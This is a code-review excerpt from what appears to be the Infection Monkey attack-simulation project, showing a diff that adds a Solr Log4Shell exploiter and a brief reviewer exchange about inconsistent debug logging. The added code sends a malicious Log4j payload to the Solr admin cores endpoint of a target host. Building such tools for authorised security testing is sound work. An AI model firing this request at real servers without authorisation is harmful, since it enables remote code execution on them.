monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/solr.py

```diff
@@ -0,0 +1,22 @@
+from logging import getLogger
+
+import requests
+
+from infection_monkey.exploit.log4shell_utils.service_exploiters import IServiceExploiter
+from infection_monkey.model import VictimHost
+
+logger = getLogger(__name__)
+
+
+class SolrExploit(IServiceExploiter):
+    service_name = "Apache Solr"
+
+    @staticmethod
+    def trigger_exploit(payload: str, host: VictimHost, port: int):
+        url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
+        try:
+            logger.debug("Sending malicious SOLR log4j request")
+            requests.post(url, timeout=5, verify=False)  # noqa DUO123
+            logger.debug("Request sent")
```

Comment:
The other two services don't have these log statements. Let's add them there or remove them here, for consistency.

Reply:
I think it is best to remove it.